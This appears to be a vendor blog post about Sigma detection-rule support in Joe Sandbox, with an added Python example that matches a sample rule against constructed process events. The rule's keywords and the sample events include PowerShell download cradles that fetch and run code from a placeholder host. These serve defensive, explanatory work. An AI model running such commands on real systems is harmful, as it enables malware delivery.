If the sandbox understands Sigma, a rule written to detect a threat on the endpoint (e.g. based on Sysmon data) can also be used to detect that threat in the sandbox. Or the other way around: Sigma rules written for a sandbox can be applied to your SIEM. Isn't that fantastic? We truly think it is!
Sigma in Joe Sandbox enables any customer to write and share threat detection rules based on dynamic (runtime) events, even without a SIEM!
Joe Sandbox also supports YARA rules (including scanning of memory dumps). YARA for the static, binary side and Sigma for the dynamic side make a perfect combination.
Events
What Sigma rules can I write in Joe Sandbox? Joe Sandbox currently supports eight different event types:
- Process creations (product: windows or linux or macos, category: process_creation)
- Sysmon: Process creation, Event ID 1 (product: windows, category: sysmon)
- Sysmon: Network connection, Event ID 3 (product: windows, category: sysmon)
- Sysmon: Remote thread creation, Event ID 8 (product: windows, category: sysmon)
- Sysmon: File creation, Event ID 11 (product: windows or linux or macos, category: sysmon)
- Sysmon: Registry key set, Event ID 13 (product: windows, category: sysmon)
- PowerShell: PowerShell Transcript Logging (product: windows, service: powershell)
- Windows Event Logs (product: windows, service: security|application|system)
A detailed description of the event fields can be found in our user guide under Sigma - List of events.
We have also added Linux and macOS support for the process creation and file creation events. With that, you can write Sigma rules covering Linux and macOS threats!
Rules
Sigma rules are written in YAML and have a very simple structure. Below you can see an example which uses the process creation event as input:
Joe Sandbox uses various optional meta attributes, such as threatname, behaviorgroup or id, which help it identify threats and classify them properly. The level attribute influences the verdict of the sandbox: for instance, many matched Sigma rules with level critical will lead to an overall malicious verdict.
The heart of the rule is the detection section, which contains one or more selections made of fields or lists. Field values support wildcards (* for any run of characters, ? for a single character). The condition is a Boolean expression over the selections; when it evaluates to true, the rule matches.
You can find the full Sigma specification here.
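To make the rule structure concrete, here is an added example that is not code from this page or from Joe Sandbox: a deliberately small Sigma matcher that evaluates a constructed process_creation rule against constructed, Sysmon-style process creation events. It shows the pieces described above: the logsource deciding which events a rule applies to, field modifiers (|endswith, |contains) and * / ? wildcards in a selection, OR across a list of values and AND across the fields of one selection, and the Boolean condition, including the common "1 of selection*" and "all of them" forms. The rule, the event dicts, the field names and the matcher itself are constructed for illustration; Joe Sandbox's own engine and field names are documented in its user guide.

```python
import re

# Constructed rule for this example (not one of Joe Security's published rules),
# written as the dict a YAML loader produces from the corresponding Sigma file.
RULE = {
    "title": "Suspicious PowerShell Download Cradle",
    "level": "high",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "DownloadFile", "IEX"],
        },
        "filter": {"ParentImage|endswith": "\\msiexec.exe"},
        "condition": "selection and not filter",
    },
}

def _wildcard_regex(pattern):
    # Sigma wildcards: '*' matches any run of characters, '?' exactly one.
    return "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)

def _value_matches(pattern, value, modifier):
    # Sigma string matching is case-insensitive; without a modifier the whole
    # event value must match the (wildcard) pattern.
    p, v = str(pattern).lower(), str(value).lower()
    ops = {"contains": lambda: p in v, "startswith": lambda: v.startswith(p),
           "endswith": lambda: v.endswith(p),
           "": lambda: re.fullmatch(_wildcard_regex(p), v, re.DOTALL) is not None}
    return ops[modifier]()

def _selection_matches(sel, event):
    # A map ANDs its fields, a list of maps ORs them, and a list of values
    # under one field ORs the values; a field absent from the event never matches.
    if isinstance(sel, list):
        return any(_selection_matches(item, event) for item in sel)
    for spec, rule_values in sel.items():
        name, _, modifier = spec.partition("|")
        values = rule_values if isinstance(rule_values, list) else [rule_values]
        if name not in event or not any(_value_matches(p, event[name], modifier) for p in values):
            return False
    return True

def evaluate_condition(condition, detection, event):
    # Recursive-descent evaluation of and/or/not, parentheses, 'N of pattern*'
    # and 'all of them' over the named selections of the detection section.
    tokens = condition.replace("(", " ( ").replace(")", " ) ").split()
    names = [n for n in detection if n != "condition"]
    pos = [0]
    def take():
        pos[0] += 1
        return tokens[pos[0] - 1]
    def of_group(quantifier, pattern):
        group = [n for n in names if pattern == "them" or re.fullmatch(_wildcard_regex(pattern), n)]
        hits = sum(_selection_matches(detection[n], event) for n in group)
        return hits == len(group) if quantifier == "all" else hits >= int(quantifier)
    def factor():
        tok = take()
        if tok == "not":
            return not factor()
        if tok == "(":
            result = expr()
            take()  # the closing ')'
            return result
        if tok == "all" or tok.isdigit():
            take()  # the keyword 'of'
            return of_group(tok, take())
        return _selection_matches(detection[tok], event)
    def chain(operand, keyword, combine):
        # operand (keyword operand)*; every operand is parsed, no short-circuit
        result = operand()
        while pos[0] < len(tokens) and tokens[pos[0]] == keyword:
            take()
            result = combine(result, operand())
        return result
    term = lambda: chain(factor, "and", lambda a, b: a and b)
    expr = lambda: chain(term, "or", lambda a, b: a or b)
    return expr()

def run_rule(rule, events):
    # Evaluate only events from the rule's logsource; return matching indices.
    det, source = rule["detection"], rule["logsource"].items()
    return [i for i, ev in enumerate(events)
            if source <= ev.get("_logsource", {}).items()
            and evaluate_condition(det["condition"], det, ev)]

# Constructed process_creation events, loosely shaped like Sysmon Event ID 1.
PROC = {"product": "windows", "category": "process_creation"}
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"_logsource": PROC, "Image": PS,  # 0: download cradle spawned by Word -> match
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
    {"_logsource": PROC, "Image": PS,  # 1: same cradle, but the filter excludes msiexec parents
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "powershell -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/b','t.exe')"},
    {"_logsource": PROC, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",  # 2: benign
     "CommandLine": "powershell -Command Get-Process"},
    {"_logsource": {"product": "windows", "category": "sysmon"}, "Image": PS,  # 3: wrong logsource
     "DestinationIp": "192.0.2.10"},
]
```

Calling run_rule(RULE, EVENTS) returns [0]: event 1 is suppressed by the filter, event 2 never satisfies the selection, and event 3 is never evaluated because its logsource does not match the rule. The same matcher evaluates conditions such as "1 of sel_*" or "all of them" over any set of named selections, which is how the field-level wildcards and the condition language compose in practice.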
Importing Rules
Importing Sigma rules is straightforward. Note that you don't need to convert any of the rules: Joe Sandbox understands Sigma natively.
To import a rule go to the Editor navigation tab. Then click Sigma:
You can either upload a Sigma rule as a .yml file or a zip of .yml files, or alternatively specify a GitHub repository containing Sigma rules:
In the latter case, Joe Sandbox will always import the latest Sigma rules from that repository. Very handy for open source repositories!
Do you want to modify a rule? This can be easily done in the Sigma editor:
Sigma matches
Once you have imported a rule, you will find the Sigma matches for new analyses in the full behavior report:
In the top navigation bar click on Overview - Sigma Overview:
Clicking on Show sources shows the underlying event responsible for the match:
Sigma Rule Feed
The events supported by Joe Sandbox currently cover around 70% of all community Sigma rules.
Joe Security itself has started writing its own Sigma rules and decided to share all current and future rules with the community under the GPL license. You will find all our Sigma rules on GitHub:
https://github.com/joesecurity/sigma-rules
Examples
We have uploaded the current community Sigma rules and the Joe Security rules to Joe Sandbox Cloud Basic. You can easily search for matched Sigma rules using Joe Sandbox View, our threat hunting & search engine:
Via Sigma, Joe Sandbox found a sample using Get2Downloader, likely associated with TA505:
Or here, a Sigma-based WannaCry detection via the open-source rules:
Joint Power
Sigma is great: it is generic and therefore makes sharing threat rules easy. There is no vendor lock-in. Joe Sandbox's community rules, once converted, can be used to search in many SIEMs.
You can write your own Sigma rules and use them in Joe Sandbox. Simply upload them in the Sigma editor and you are ready to rock!
Would you like to try Joe Sandbox? Then contact us today to get a trial for Joe Sandbox Cloud Pro.